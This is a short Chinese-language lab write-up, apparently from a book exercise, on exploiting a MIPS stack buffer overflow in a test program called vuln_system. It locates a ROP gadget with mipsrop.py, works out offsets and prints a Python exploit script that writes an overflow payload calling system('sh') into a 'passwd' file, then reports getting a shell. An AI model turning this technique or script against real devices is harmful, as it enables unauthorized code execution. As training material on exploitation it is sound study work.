MIPS缓冲区溢出 — exploit
根据上文分析得到的offset,接下来拼接shellcode,首先使用ida脚本mipsrop.py查找可用的rop chain

跳转到此rop chain代码处,需要构造system执行的命令
cmd == 寄存器A1值 == 0x00402060处的$sp,0x58-0x40
address == 寄存器RA == 0x58-0x4

寄存器RA的值需要是system的执行函数,根据function name找到do_system_0,查看调用指令,地址在0x00400708,所以0x40 – 0x4 == 0x3C 处存放此地址

整理出的ROP Chain(书中有错误)

据此编写exp.py
#/usr/bin/env python import struct print '[*] prepare shellcode ', cmd = 'sh' cmd += "\x00"*(4-(len(cmd)%4)) shellcode = "A"*0x19c shellcode += struct.pack(">L", 0x00402060) shellcode += "A"*0x18 shellcode += cmd shellcode += "B"*(0x3C-len(cmd)) shellcode += struct.pack(">L", 0x00400708) shellcode += "CCCC" print ' ok' print '[+] create passwd file ', fw = open('passwd','w') fw.write(shellcode) fw.close() print ' ok'
执行py文件,shellcode写入passwd文件成功

执行vuln_system程序,高贵的$符号出现,说明exp成功
